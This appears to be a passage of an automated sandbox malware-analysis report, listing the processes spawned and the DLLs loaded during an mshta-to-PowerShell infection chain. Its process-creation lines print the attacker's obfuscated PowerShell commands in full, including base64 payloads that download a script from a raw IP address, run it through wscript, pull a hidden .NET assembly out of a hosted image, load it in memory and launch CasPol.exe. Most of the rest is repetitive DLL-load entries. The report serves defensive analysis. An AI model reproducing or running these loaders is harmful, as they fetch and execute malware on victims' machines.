Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
